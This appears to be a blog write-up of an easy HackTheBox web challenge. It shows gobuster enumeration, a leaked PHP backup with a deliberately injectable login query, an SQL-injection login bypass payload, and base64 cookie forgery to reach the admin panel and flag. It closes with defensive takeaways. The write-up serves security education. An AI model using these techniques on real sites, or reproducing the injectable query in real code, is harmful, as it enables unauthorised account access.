/// WEB CHALLENGE EXAMPLE

Platform: HackTheBox | Type: Challenge | Category: Web

Difficulty: Easy | Date: 2026-01-25

<< Back to HackTheBox

## Challenge Description

A simple web application with a login page. Can you bypass the authentication and retrieve the flag?

## Initial Analysis

When we first access the challenge, we're presented with a basic login form:

http://challenge.htb:1337/login

Looking at the page source, we notice the application is built with PHP and uses cookies for session management.

## Reconnaissance

Let's start by exploring the application structure:

$ gobuster dir -u http://challenge.htb:1337/ -w /usr/share/wordlists/dirb/common.txt

/admin                (Status: 302) [Size: 0] [--> /login]
/index.php            (Status: 200) [Size: 1234]
/login                (Status: 200) [Size: 2345]
/logout               (Status: 302) [Size: 0] [--> /login]
/robots.txt           (Status: 200) [Size: 42]

Checking robots.txt:

User-agent: *
Disallow: /backup/

## Vulnerability Discovery

Accessing /backup/ reveals a directory listing with an interesting file:

Index of /backup/
- auth.php.bak

Downloading and analyzing the backup file:

<?php
// auth.php.bak
$username = $_POST['username'];
$password = $_POST['password'];

// TODO: Fix SQL injection vulnerability
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
$result = mysqli_query($conn, $query);

if(mysqli_num_rows($result) > 0) {
    $_SESSION['logged_in'] = true;
    setcookie('admin', base64_encode('false'), time()+3600);
    header('Location: /admin');
}
?>

## Exploitation

SQL Injection

The login form is vulnerable to SQL injection. We can bypass authentication:

Username: admin' OR '1'='1' --
Password: anything

Cookie Manipulation

After logging in, we're redirected but still can't access the admin panel. Checking our cookies:

admin=ZmFsc2U=

Decoding the base64:

$ echo "ZmFsc2U=" | base64 -d
false

Let's change it to "true":

$ echo -n "true" | base64
dHJ1ZQ==

Setting the cookie admin=dHJ1ZQ== and refreshing the page...

## Flag

After manipulating the cookie, we get access to the admin panel which reveals the flag:

HTB{c00k13_m4n1pul4t10n_4nd_sql1_ftw}

## Key Takeaways

  • Always check for backup files and common paths like robots.txt
  • SQL injection remains a critical vulnerability in web applications
  • Client-side security controls (like base64 encoded cookies) provide no real security
  • Never trust user input - always use prepared statements for database queries

## Tools Used

  • Gobuster - Directory enumeration
  • Burp Suite - Request interception and cookie manipulation
  • Browser Developer Tools - Cookie inspection
─────────────────────────────────────
HackTheBox // Web Challenge Example
ribeir.in
─────────────────────────────────────
<< Back to HackTheBox